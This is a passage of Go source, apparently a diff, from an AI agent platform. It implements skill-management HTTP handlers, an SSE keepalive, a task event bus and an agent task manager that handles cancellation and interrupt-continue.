skillMD, err := skillpackage.BuildSkillMD(m, req.Content)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if err := skillpackage.ValidateSkillMDPackage(skillMD, skillName); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
skillDir := filepath.Join(h.skillsRootAbs(), skillName)
|
||||
|
||||
if err := os.WriteFile(filepath.Join(skillDir, "SKILL.md"), skillMD, 0644); err != nil {
|
||||
h.logger.Error("更新 SKILL.md 失败", zap.String("skill", skillName), zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "更新 SKILL.md 失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
h.logger.Info("更新skill成功", zap.String("skill", skillName))
|
||||
if h.audit != nil {
|
||||
h.audit.RecordOK(c, "skill", "update", "更新 Skill", "skill", skillName, nil)
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"message": "skill已更新",
|
||||
})
|
||||
}
|
||||
|
||||
// DeleteSkill 删除skill
|
||||
func (h *SkillsHandler) DeleteSkill(c *gin.Context) {
|
||||
skillName := c.Param("name")
|
||||
if skillName == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "skill名称不能为空"})
|
||||
return
|
||||
}
|
||||
|
||||
// 检查是否有角色绑定了该skill,如果有则自动移除绑定
|
||||
affectedRoles := h.removeSkillFromRoles(skillName)
|
||||
if len(affectedRoles) > 0 {
|
||||
h.logger.Info("从角色中移除skill绑定",
|
||||
zap.String("skill", skillName),
|
||||
zap.Strings("roles", affectedRoles))
|
||||
}
|
||||
|
||||
skillDir := filepath.Join(h.skillsRootAbs(), skillName)
|
||||
if err := os.RemoveAll(skillDir); err != nil {
|
||||
h.logger.Error("删除skill失败", zap.String("skill", skillName), zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "删除skill失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
responseMsg := "skill已删除"
|
||||
if len(affectedRoles) > 0 {
|
||||
responseMsg = fmt.Sprintf("skill已删除,已自动从 %d 个角色中移除绑定: %s",
|
||||
len(affectedRoles), strings.Join(affectedRoles, ", "))
|
||||
}
|
||||
|
||||
h.logger.Info("删除skill成功", zap.String("skill", skillName))
|
||||
if h.audit != nil {
|
||||
h.audit.RecordOK(c, "skill", "delete", "删除 Skill", "skill", skillName, map[string]interface{}{
|
||||
"affected_roles": affectedRoles,
|
||||
})
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"message": responseMsg,
|
||||
"affected_roles": affectedRoles,
|
||||
})
|
||||
}
|
||||
|
||||
// GetSkillStats 获取skills调用统计信息
|
||||
func (h *SkillsHandler) GetSkillStats(c *gin.Context) {
|
||||
skillList, err := skillpackage.ListSkillDirNames(h.skillsRootAbs())
|
||||
if err != nil {
|
||||
h.logger.Error("获取skills列表失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
skillsDir := h.skillsRootAbs()
|
||||
|
||||
// 从数据库加载调用统计
|
||||
var skillStatsMap map[string]*database.SkillStats
|
||||
if h.db != nil {
|
||||
dbStats, err := h.db.LoadSkillStats()
|
||||
if err != nil {
|
||||
h.logger.Warn("从数据库加载Skills统计信息失败", zap.Error(err))
|
||||
skillStatsMap = make(map[string]*database.SkillStats)
|
||||
} else {
|
||||
skillStatsMap = dbStats
|
||||
}
|
||||
} else {
|
||||
skillStatsMap = make(map[string]*database.SkillStats)
|
||||
}
|
||||
|
||||
// 构建统计信息(包含所有skills,即使没有调用记录)
|
||||
statsList := make([]map[string]interface{}, 0, len(skillList))
|
||||
totalCalls := 0
|
||||
totalSuccess := 0
|
||||
totalFailed := 0
|
||||
|
||||
for _, skillName := range skillList {
|
||||
stat, exists := skillStatsMap[skillName]
|
||||
if !exists {
|
||||
stat = &database.SkillStats{
|
||||
SkillName: skillName,
|
||||
TotalCalls: 0,
|
||||
SuccessCalls: 0,
|
||||
FailedCalls: 0,
|
||||
}
|
||||
}
|
||||
|
||||
totalCalls += stat.TotalCalls
|
||||
totalSuccess += stat.SuccessCalls
|
||||
totalFailed += stat.FailedCalls
|
||||
|
||||
lastCallTimeStr := ""
|
||||
if stat.LastCallTime != nil {
|
||||
lastCallTimeStr = stat.LastCallTime.Format("2006-01-02 15:04:05")
|
||||
}
|
||||
|
||||
statsList = append(statsList, map[string]interface{}{
|
||||
"skill_name": stat.SkillName,
|
||||
"total_calls": stat.TotalCalls,
|
||||
"success_calls": stat.SuccessCalls,
|
||||
"failed_calls": stat.FailedCalls,
|
||||
"last_call_time": lastCallTimeStr,
|
||||
})
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"total_skills": len(skillList),
|
||||
"total_calls": totalCalls,
|
||||
"total_success": totalSuccess,
|
||||
"total_failed": totalFailed,
|
||||
"skills_dir": skillsDir,
|
||||
"stats": statsList,
|
||||
})
|
||||
}
|
||||
|
||||
// ClearSkillStats 清空所有Skills统计信息
|
||||
func (h *SkillsHandler) ClearSkillStats(c *gin.Context) {
|
||||
if h.db == nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "数据库连接未配置"})
|
||||
return
|
||||
}
|
||||
|
||||
if err := h.db.ClearSkillStats(); err != nil {
|
||||
h.logger.Error("清空Skills统计信息失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "清空统计信息失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
h.logger.Info("已清空所有Skills统计信息")
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"message": "已清空所有Skills统计信息",
|
||||
})
|
||||
}
|
||||
|
||||
// ClearSkillStatsByName 清空指定skill的统计信息
|
||||
func (h *SkillsHandler) ClearSkillStatsByName(c *gin.Context) {
|
||||
skillName := c.Param("name")
|
||||
if skillName == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "skill名称不能为空"})
|
||||
return
|
||||
}
|
||||
|
||||
if h.db == nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "数据库连接未配置"})
|
||||
return
|
||||
}
|
||||
|
||||
if err := h.db.ClearSkillStatsByName(skillName); err != nil {
|
||||
h.logger.Error("清空指定skill统计信息失败", zap.String("skill", skillName), zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "清空统计信息失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
h.logger.Info("已清空指定skill统计信息", zap.String("skill", skillName))
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"message": fmt.Sprintf("已清空skill '%s' 的统计信息", skillName),
|
||||
})
|
||||
}
|
||||
|
||||
// removeSkillFromRoles 预留:角色不再存储 skill 绑定,无操作。
|
||||
func (h *SkillsHandler) removeSkillFromRoles(skillName string) []string {
|
||||
_ = skillName
|
||||
return nil
|
||||
}
|
||||
|
||||
// saveRolesConfig 保存角色配置到文件(从SkillsHandler调用)
|
||||
func (h *SkillsHandler) saveRolesConfig() error {
|
||||
configDir := filepath.Dir(h.configPath)
|
||||
rolesDir := h.config.RolesDir
|
||||
if rolesDir == "" {
|
||||
rolesDir = "roles" // 默认目录
|
||||
}
|
||||
|
||||
// 如果是相对路径,相对于配置文件所在目录
|
||||
if !filepath.IsAbs(rolesDir) {
|
||||
rolesDir = filepath.Join(configDir, rolesDir)
|
||||
}
|
||||
|
||||
// 确保目录存在
|
||||
if err := os.MkdirAll(rolesDir, 0755); err != nil {
|
||||
return fmt.Errorf("创建角色目录失败: %w", err)
|
||||
}
|
||||
|
||||
// 保存每个角色到独立的文件
|
||||
if h.config.Roles != nil {
|
||||
for roleName, role := range h.config.Roles {
|
||||
// 确保角色名称正确设置
|
||||
if role.Name == "" {
|
||||
role.Name = roleName
|
||||
}
|
||||
|
||||
// 使用角色名称作为文件名(安全化文件名,避免特殊字符)
|
||||
safeFileName := sanitizeRoleFileName(role.Name)
|
||||
roleFile := filepath.Join(rolesDir, safeFileName+".yaml")
|
||||
|
||||
// 将角色配置序列化为YAML
|
||||
roleData, err := yaml.Marshal(&role)
|
||||
if err != nil {
|
||||
h.logger.Error("序列化角色配置失败", zap.String("role", roleName), zap.Error(err))
|
||||
continue
|
||||
}
|
||||
|
||||
// 处理icon字段:确保包含\U的icon值被引号包围(YAML需要引号才能正确解析Unicode转义)
|
||||
roleDataStr := string(roleData)
|
||||
if role.Icon != "" && strings.HasPrefix(role.Icon, "\\U") {
|
||||
// 匹配 icon: \UXXXXXXXX 格式(没有引号),排除已经有引号的情况
|
||||
re := regexp.MustCompile(`(?m)^(icon:\s+)(\\U[0-9A-F]{8})(\s*)$`)
|
||||
roleDataStr = re.ReplaceAllString(roleDataStr, `${1}"${2}"${3}`)
|
||||
roleData = []byte(roleDataStr)
|
||||
}
|
||||
|
||||
// 写入文件
|
||||
if err := os.WriteFile(roleFile, roleData, 0644); err != nil {
|
||||
h.logger.Error("保存角色配置文件失败", zap.String("role", roleName), zap.String("file", roleFile), zap.Error(err))
|
||||
continue
|
||||
}
|
||||
|
||||
h.logger.Info("角色配置已保存到文件", zap.String("role", roleName), zap.String("file", roleFile))
|
||||
}
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// sanitizeRoleFileName 将角色名称转换为安全的文件名
|
||||
func sanitizeRoleFileName(name string) string {
|
||||
// 替换可能不安全的字符
|
||||
replacer := map[rune]string{
|
||||
'/': "_",
|
||||
'\\': "_",
|
||||
':': "_",
|
||||
'*': "_",
|
||||
'?': "_",
|
||||
'"': "_",
|
||||
'<': "_",
|
||||
'>': "_",
|
||||
'|': "_",
|
||||
' ': "_",
|
||||
}
|
||||
|
||||
var result []rune
|
||||
for _, r := range name {
|
||||
if replacement, ok := replacer[r]; ok {
|
||||
result = append(result, []rune(replacement)...)
|
||||
} else {
|
||||
result = append(result, r)
|
||||
}
|
||||
}
|
||||
|
||||
fileName := string(result)
|
||||
// 如果文件名为空,使用默认名称
|
||||
if fileName == "" {
|
||||
fileName = "role"
|
||||
}
|
||||
|
||||
return fileName
|
||||
}
|
||||
|
||||
// isValidSkillName 验证 skill 目录名(与 Agent Skills 的 name 字段一致:小写、数字、连字符)
|
||||
func isValidSkillName(name string) bool {
|
||||
if name == "" || len(name) > 100 {
|
||||
return false
|
||||
}
|
||||
for _, r := range name {
|
||||
if !((r >= 'a' && r <= 'z') || (r >= '0' && r <= '9') || r == '-') {
|
||||
return false
|
||||
}
|
||||
}
|
||||
return true
|
||||
}
|
||||
@@ -0,0 +1,58 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"net/http"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
)
|
||||
|
||||
// sseInterval is how often we write on long SSE streams. Shorter intervals help NATs and
|
||||
// some proxies that treat connections as idle; 10s is a reasonable balance with traffic.
|
||||
const sseKeepaliveInterval = 10 * time.Second
|
||||
|
||||
// sseKeepalive sends periodic SSE traffic so proxies (e.g. nginx proxy_read_timeout), NATs,
|
||||
// and load balancers do not close long-running streams. Some intermediaries ignore comment-only
|
||||
// lines, so we send both a comment and a minimal data frame (type heartbeat) per tick.
|
||||
//
|
||||
// writeMu must be the same mutex used by sendEvent for this request: concurrent writes to
|
||||
// http.ResponseWriter break chunked transfer encoding (browser: net::ERR_INVALID_CHUNKED_ENCODING).
|
||||
func sseKeepalive(c *gin.Context, stop <-chan struct{}, writeMu *sync.Mutex) {
|
||||
if writeMu == nil {
|
||||
return
|
||||
}
|
||||
ticker := time.NewTicker(sseKeepaliveInterval)
|
||||
defer ticker.Stop()
|
||||
for {
|
||||
select {
|
||||
case <-stop:
|
||||
return
|
||||
case <-c.Request.Context().Done():
|
||||
return
|
||||
case <-ticker.C:
|
||||
select {
|
||||
case <-stop:
|
||||
return
|
||||
case <-c.Request.Context().Done():
|
||||
return
|
||||
default:
|
||||
}
|
||||
writeMu.Lock()
|
||||
if _, err := fmt.Fprintf(c.Writer, ": keepalive\n\n"); err != nil {
|
||||
writeMu.Unlock()
|
||||
return
|
||||
}
|
||||
// data: frame so strict proxies still see downstream bytes (comments alone may not reset timers)
|
||||
if _, err := fmt.Fprintf(c.Writer, `data: {"type":"heartbeat"}`+"\n\n"); err != nil {
|
||||
writeMu.Unlock()
|
||||
return
|
||||
}
|
||||
if flusher, ok := c.Writer.(http.Flusher); ok {
|
||||
flusher.Flush()
|
||||
}
|
||||
writeMu.Unlock()
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,116 @@
|
||||
package handler
|
||||
|
||||
import "sync"
|
||||
|
||||
// TaskEventBus 将主 SSE 连接上的事件镜像给后订阅的客户端(例如刷新页面后、HITL 审批通过需继续收事件)。
|
||||
// 每个 payload 为完整 SSE 行: "data: {...}\n\n"
|
||||
type TaskEventBus struct {
|
||||
mu sync.RWMutex
|
||||
subs map[string]map[*taskEventSub]struct{}
|
||||
}
|
||||
|
||||
type taskEventSub struct {
|
||||
mu sync.Mutex
|
||||
ch chan []byte
|
||||
closed bool
|
||||
}
|
||||
|
||||
func (s *taskEventSub) sendNonBlocking(line []byte) bool {
|
||||
if s == nil {
|
||||
return false
|
||||
}
|
||||
s.mu.Lock()
|
||||
defer s.mu.Unlock()
|
||||
if s.closed {
|
||||
return false
|
||||
}
|
||||
select {
|
||||
case s.ch <- line:
|
||||
return true
|
||||
default:
|
||||
return false
|
||||
}
|
||||
}
|
||||
|
||||
func (s *taskEventSub) closeOnce() {
|
||||
if s == nil {
|
||||
return
|
||||
}
|
||||
s.mu.Lock()
|
||||
defer s.mu.Unlock()
|
||||
if s.closed {
|
||||
return
|
||||
}
|
||||
s.closed = true
|
||||
close(s.ch)
|
||||
}
|
||||
|
||||
func NewTaskEventBus() *TaskEventBus {
|
||||
return &TaskEventBus{
|
||||
subs: make(map[string]map[*taskEventSub]struct{}),
|
||||
}
|
||||
}
|
||||
|
||||
// Subscribe 注册订阅;cancel 时需调用 Unsubscribe。
|
||||
func (b *TaskEventBus) Subscribe(conversationID string) (sub *taskEventSub, ch <-chan []byte) {
|
||||
chBuf := make(chan []byte, 256)
|
||||
sub = &taskEventSub{ch: chBuf}
|
||||
b.mu.Lock()
|
||||
if b.subs[conversationID] == nil {
|
||||
b.subs[conversationID] = make(map[*taskEventSub]struct{})
|
||||
}
|
||||
b.subs[conversationID][sub] = struct{}{}
|
||||
b.mu.Unlock()
|
||||
return sub, chBuf
|
||||
}
|
||||
|
||||
func (b *TaskEventBus) Unsubscribe(conversationID string, sub *taskEventSub) {
|
||||
if sub == nil {
|
||||
return
|
||||
}
|
||||
b.mu.Lock()
|
||||
m, ok := b.subs[conversationID]
|
||||
if !ok {
|
||||
b.mu.Unlock()
|
||||
return
|
||||
}
|
||||
delete(m, sub)
|
||||
if len(m) == 0 {
|
||||
delete(b.subs, conversationID)
|
||||
}
|
||||
b.mu.Unlock()
|
||||
sub.closeOnce()
|
||||
}
|
||||
|
||||
// Publish 非阻塞投递;慢消费者丢帧(HITL 场景以最新状态为准,丢帧可接受)。
|
||||
func (b *TaskEventBus) Publish(conversationID string, line []byte) {
|
||||
if b == nil || conversationID == "" || len(line) == 0 {
|
||||
return
|
||||
}
|
||||
b.mu.RLock()
|
||||
m := b.subs[conversationID]
|
||||
subs := make([]*taskEventSub, 0, len(m))
|
||||
for s := range m {
|
||||
subs = append(subs, s)
|
||||
}
|
||||
b.mu.RUnlock()
|
||||
|
||||
cp := append([]byte(nil), line...)
|
||||
for _, s := range subs {
|
||||
s.sendNonBlocking(cp)
|
||||
}
|
||||
}
|
||||
|
||||
// CloseConversation 任务结束时关闭该会话所有订阅 channel。
|
||||
func (b *TaskEventBus) CloseConversation(conversationID string) {
|
||||
if b == nil || conversationID == "" {
|
||||
return
|
||||
}
|
||||
b.mu.Lock()
|
||||
m := b.subs[conversationID]
|
||||
delete(b.subs, conversationID)
|
||||
b.mu.Unlock()
|
||||
for sub := range m {
|
||||
sub.closeOnce()
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,407 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"context"
|
||||
"errors"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/multiagent"
|
||||
)
|
||||
|
||||
// ErrTaskCancelled 用户取消任务的错误
|
||||
var ErrTaskCancelled = errors.New("agent task cancelled by user")
|
||||
|
||||
// ErrTaskAlreadyRunning 会话已有任务正在执行
|
||||
var ErrTaskAlreadyRunning = errors.New("agent task already running for conversation")
|
||||
|
||||
// shouldPersistEinoAgentTraceAfterRunError:Eino 相关 Run 非成功返回时,是否仍写入 last_react_* 供下轮 loadHistoryFromAgentTrace。
|
||||
// 当前策略:无论正常结束、异常结束或用户主动停止,都尽量保留最后可用轨迹,
|
||||
// 以便在同一会话继续时可基于原始上下文续跑,而不是回退到仅消息文本历史。
|
||||
func shouldPersistEinoAgentTraceAfterRunError(baseCtx context.Context) bool {
|
||||
return true
|
||||
}
|
||||
|
||||
// AgentTask 描述正在运行的Agent任务
|
||||
type AgentTask struct {
|
||||
ConversationID string `json:"conversationId"`
|
||||
Message string `json:"message,omitempty"`
|
||||
StartedAt time.Time `json:"startedAt"`
|
||||
Status string `json:"status"`
|
||||
CancellingAt time.Time `json:"-"` // 进入 cancelling 状态的时间,用于清理长时间卡住的任务
|
||||
|
||||
// ActiveMCPExecutionID 当前正在执行的 MCP 工具 executionId(仅内存,供「中断并继续」= 仅掐当前工具)
|
||||
ActiveMCPExecutionID string `json:"-"`
|
||||
|
||||
// InterruptContinueNote 无 MCP 时「中断并继续」由用户在弹窗中填写的补充说明(Cancel 前写入,续跑轮次读取后清空)
|
||||
InterruptContinueNote string `json:"-"`
|
||||
|
||||
cancel func(error)
|
||||
}
|
||||
|
||||
// RegisterRunningTool 实现 mcp.ToolRunRegistry:工具开始时登记本会话当前 executionId。
|
||||
func (m *AgentTaskManager) RegisterRunningTool(conversationID, executionID string) {
|
||||
conversationID = strings.TrimSpace(conversationID)
|
||||
executionID = strings.TrimSpace(executionID)
|
||||
if conversationID == "" || executionID == "" {
|
||||
return
|
||||
}
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
if t, ok := m.tasks[conversationID]; ok && t != nil {
|
||||
t.ActiveMCPExecutionID = executionID
|
||||
}
|
||||
}
|
||||
|
||||
// UnregisterRunningTool 工具结束时清除登记(仅当 id 仍匹配时清除,避免并发串单)。
|
||||
func (m *AgentTaskManager) UnregisterRunningTool(conversationID, executionID string) {
|
||||
conversationID = strings.TrimSpace(conversationID)
|
||||
executionID = strings.TrimSpace(executionID)
|
||||
if conversationID == "" || executionID == "" {
|
||||
return
|
||||
}
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
if t, ok := m.tasks[conversationID]; ok && t != nil {
|
||||
if t.ActiveMCPExecutionID == executionID {
|
||||
t.ActiveMCPExecutionID = ""
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// SetInterruptContinueNote 在发起 ErrInterruptContinue 取消前写入用户补充说明(仅内存)。
|
||||
func (m *AgentTaskManager) SetInterruptContinueNote(conversationID, note string) {
|
||||
conversationID = strings.TrimSpace(conversationID)
|
||||
if conversationID == "" {
|
||||
return
|
||||
}
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
if t, ok := m.tasks[conversationID]; ok && t != nil {
|
||||
t.InterruptContinueNote = note
|
||||
}
|
||||
}
|
||||
|
||||
// TakeInterruptContinueNote 读取并清空补充说明(续跑开始时调用一次)。
|
||||
func (m *AgentTaskManager) TakeInterruptContinueNote(conversationID string) string {
|
||||
conversationID = strings.TrimSpace(conversationID)
|
||||
if conversationID == "" {
|
||||
return ""
|
||||
}
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
if t, ok := m.tasks[conversationID]; ok && t != nil {
|
||||
n := t.InterruptContinueNote
|
||||
t.InterruptContinueNote = ""
|
||||
return n
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
// BindTaskCancel 在同一运行任务内替换与 context 绑定的 cancel 函数(用于中断后继续时换新 baseCtx)。
|
||||
func (m *AgentTaskManager) BindTaskCancel(conversationID string, cancel context.CancelCauseFunc) {
|
||||
conversationID = strings.TrimSpace(conversationID)
|
||||
if conversationID == "" || cancel == nil {
|
||||
return
|
||||
}
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
if t, ok := m.tasks[conversationID]; ok && t != nil {
|
||||
t.cancel = func(err error) {
|
||||
cancel(err)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// ActiveMCPExecutionID 返回当前会话进行中的工具 executionId,无则空串。
|
||||
func (m *AgentTaskManager) ActiveMCPExecutionID(conversationID string) string {
|
||||
conversationID = strings.TrimSpace(conversationID)
|
||||
if conversationID == "" {
|
||||
return ""
|
||||
}
|
||||
m.mu.RLock()
|
||||
defer m.mu.RUnlock()
|
||||
if t, ok := m.tasks[conversationID]; ok && t != nil {
|
||||
return strings.TrimSpace(t.ActiveMCPExecutionID)
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
// CompletedTask 已完成的任务(用于历史记录)
|
||||
type CompletedTask struct {
|
||||
ConversationID string `json:"conversationId"`
|
||||
Message string `json:"message,omitempty"`
|
||||
StartedAt time.Time `json:"startedAt"`
|
||||
CompletedAt time.Time `json:"completedAt"`
|
||||
Status string `json:"status"`
|
||||
}
|
||||
|
||||
// AgentTaskManager 管理正在运行的Agent任务
|
||||
type AgentTaskManager struct {
|
||||
mu sync.RWMutex
|
||||
tasks map[string]*AgentTask
|
||||
completedTasks []*CompletedTask // 最近完成的任务历史
|
||||
maxHistorySize int // 最大历史记录数
|
||||
historyRetention time.Duration // 历史记录保留时间
|
||||
eventBus *TaskEventBus // 可选:任务结束时关闭镜像 SSE 订阅
|
||||
}
|
||||
|
||||
const (
|
||||
// cancellingStuckThreshold 处于「取消中」超过此时长则强制从运行列表移除。正常取消会在当前步骤内返回,
|
||||
// 超过则视为卡住,尽快释放会话。常见做法多为 30–60s 内释放。
|
||||
cancellingStuckThreshold = 45 * time.Second
|
||||
// cancellingStuckThresholdLegacy 未记录 CancellingAt 时用 StartedAt 判断的兜底时长
|
||||
cancellingStuckThresholdLegacy = 2 * time.Minute
|
||||
cleanupInterval = 15 * time.Second // 与上面阈值配合,最长约 60s 内移除
|
||||
)
|
||||
|
||||
// NewAgentTaskManager 创建任务管理器
|
||||
func NewAgentTaskManager() *AgentTaskManager {
|
||||
m := &AgentTaskManager{
|
||||
tasks: make(map[string]*AgentTask),
|
||||
completedTasks: make([]*CompletedTask, 0),
|
||||
maxHistorySize: 50, // 最多保留50条历史记录
|
||||
historyRetention: 24 * time.Hour, // 保留24小时
|
||||
}
|
||||
go m.runStuckCancellingCleanup()
|
||||
return m
|
||||
}
|
||||
|
||||
// SetTaskEventBus 设置任务事件总线(与 AgentHandler 共用同一实例)。
|
||||
func (m *AgentTaskManager) SetTaskEventBus(b *TaskEventBus) {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
m.eventBus = b
|
||||
}
|
||||
|
||||
// GetTask 返回运行中任务(无则 nil)。
|
||||
func (m *AgentTaskManager) GetTask(conversationID string) *AgentTask {
|
||||
m.mu.RLock()
|
||||
defer m.mu.RUnlock()
|
||||
return m.tasks[conversationID]
|
||||
}
|
||||
|
||||
// runStuckCancellingCleanup 定期将长时间处于「取消中」的任务强制结束,避免卡住无法发新消息
|
||||
func (m *AgentTaskManager) runStuckCancellingCleanup() {
|
||||
ticker := time.NewTicker(cleanupInterval)
|
||||
defer ticker.Stop()
|
||||
for range ticker.C {
|
||||
m.cleanupStuckCancelling()
|
||||
}
|
||||
}
|
||||
|
||||
func (m *AgentTaskManager) cleanupStuckCancelling() {
|
||||
m.mu.Lock()
|
||||
var toFinish []string
|
||||
now := time.Now()
|
||||
for id, task := range m.tasks {
|
||||
if task.Status != "cancelling" {
|
||||
continue
|
||||
}
|
||||
var elapsed time.Duration
|
||||
if !task.CancellingAt.IsZero() {
|
||||
elapsed = now.Sub(task.CancellingAt)
|
||||
if elapsed < cancellingStuckThreshold {
|
||||
continue
|
||||
}
|
||||
} else {
|
||||
elapsed = now.Sub(task.StartedAt)
|
||||
if elapsed < cancellingStuckThresholdLegacy {
|
||||
continue
|
||||
}
|
||||
}
|
||||
toFinish = append(toFinish, id)
|
||||
}
|
||||
m.mu.Unlock()
|
||||
for _, id := range toFinish {
|
||||
m.FinishTask(id, "cancelled")
|
||||
}
|
||||
}
|
||||
|
||||
// StartTask 注册并开始一个新的任务
|
||||
func (m *AgentTaskManager) StartTask(conversationID, message string, cancel context.CancelCauseFunc) (*AgentTask, error) {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
|
||||
if _, exists := m.tasks[conversationID]; exists {
|
||||
return nil, ErrTaskAlreadyRunning
|
||||
}
|
||||
|
||||
task := &AgentTask{
|
||||
ConversationID: conversationID,
|
||||
Message: message,
|
||||
StartedAt: time.Now(),
|
||||
Status: "running",
|
||||
cancel: func(err error) {
|
||||
if cancel != nil {
|
||||
cancel(err)
|
||||
}
|
||||
},
|
||||
}
|
||||
|
||||
m.tasks[conversationID] = task
|
||||
return task, nil
|
||||
}
|
||||
|
||||
// CancelTask 取消指定会话的任务。若任务已在取消中,仍返回 (true, nil) 以便接口幂等、前端不报错。
|
||||
func (m *AgentTaskManager) CancelTask(conversationID string, cause error) (bool, error) {
|
||||
m.mu.Lock()
|
||||
task, exists := m.tasks[conversationID]
|
||||
if !exists {
|
||||
m.mu.Unlock()
|
||||
return false, nil
|
||||
}
|
||||
|
||||
// 如果已经处于取消流程,视为成功(幂等),避免前端重复点击报「未找到任务」
|
||||
if task.Status == "cancelling" {
|
||||
m.mu.Unlock()
|
||||
return true, nil
|
||||
}
|
||||
|
||||
// ErrInterruptContinue:仅掐断当前推理步骤,随后由处理器续跑,不进入长时间「取消中」态。
|
||||
if cause != nil && errors.Is(cause, multiagent.ErrInterruptContinue) {
|
||||
task.Status = "running"
|
||||
} else {
|
||||
task.Status = "cancelling"
|
||||
task.CancellingAt = time.Now()
|
||||
}
|
||||
if cause != nil && errors.Is(cause, ErrTaskCancelled) {
|
||||
task.InterruptContinueNote = ""
|
||||
}
|
||||
cancel := task.cancel
|
||||
m.mu.Unlock()
|
||||
|
||||
if cause == nil {
|
||||
cause = ErrTaskCancelled
|
||||
}
|
||||
if cancel != nil {
|
||||
cancel(cause)
|
||||
}
|
||||
return true, nil
|
||||
}
|
||||
|
||||
// UpdateTaskStatus 更新任务状态但不删除任务(用于在发送事件前更新状态)
|
||||
func (m *AgentTaskManager) UpdateTaskStatus(conversationID string, status string) {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
|
||||
task, exists := m.tasks[conversationID]
|
||||
if !exists {
|
||||
return
|
||||
}
|
||||
|
||||
if status != "" {
|
||||
task.Status = status
|
||||
}
|
||||
}
|
||||
|
||||
// FinishTask 完成任务并从管理器中移除
|
||||
func (m *AgentTaskManager) FinishTask(conversationID string, finalStatus string) {
|
||||
m.mu.Lock()
|
||||
task, exists := m.tasks[conversationID]
|
||||
if !exists {
|
||||
m.mu.Unlock()
|
||||
return
|
||||
}
|
||||
|
||||
if finalStatus != "" {
|
||||
task.Status = finalStatus
|
||||
}
|
||||
|
||||
// 保存到历史记录
|
||||
completedTask := &CompletedTask{
|
||||
ConversationID: task.ConversationID,
|
||||
Message: task.Message,
|
||||
StartedAt: task.StartedAt,
|
||||
CompletedAt: time.Now(),
|
||||
Status: finalStatus,
|
||||
}
|
||||
|
||||
// 添加到历史记录
|
||||
m.completedTasks = append(m.completedTasks, completedTask)
|
||||
|
||||
// 清理过期和过多的历史记录
|
||||
m.cleanupHistory()
|
||||
|
||||
// 从运行任务中移除
|
||||
delete(m.tasks, conversationID)
|
||||
bus := m.eventBus
|
||||
m.mu.Unlock()
|
||||
if bus != nil {
|
||||
bus.CloseConversation(conversationID)
|
||||
}
|
||||
}
|
||||
|
||||
// cleanupHistory 清理过期的历史记录
|
||||
func (m *AgentTaskManager) cleanupHistory() {
|
||||
now := time.Now()
|
||||
cutoffTime := now.Add(-m.historyRetention)
|
||||
|
||||
// 过滤掉过期的记录
|
||||
validTasks := make([]*CompletedTask, 0, len(m.completedTasks))
|
||||
for _, task := range m.completedTasks {
|
||||
if task.CompletedAt.After(cutoffTime) {
|
||||
validTasks = append(validTasks, task)
|
||||
}
|
||||
}
|
||||
|
||||
// 如果仍然超过最大数量,只保留最新的
|
||||
if len(validTasks) > m.maxHistorySize {
|
||||
// 按完成时间排序,保留最新的
|
||||
// 由于是追加的,最新的在最后,所以直接取最后N个
|
||||
start := len(validTasks) - m.maxHistorySize
|
||||
validTasks = validTasks[start:]
|
||||
}
|
||||
|
||||
m.completedTasks = validTasks
|
||||
}
|
||||
|
||||
// GetActiveTasks 返回所有正在运行的任务
|
||||
func (m *AgentTaskManager) GetActiveTasks() []*AgentTask {
|
||||
m.mu.RLock()
|
||||
defer m.mu.RUnlock()
|
||||
|
||||
result := make([]*AgentTask, 0, len(m.tasks))
|
||||
for _, task := range m.tasks {
|
||||
result = append(result, &AgentTask{
|
||||
ConversationID: task.ConversationID,
|
||||
Message: task.Message,
|
||||
StartedAt: task.StartedAt,
|
||||
Status: task.Status,
|
||||
})
|
||||
}
|
||||
return result
|
||||
}
|
||||
|
||||
// GetCompletedTasks 返回最近完成的任务历史
|
||||
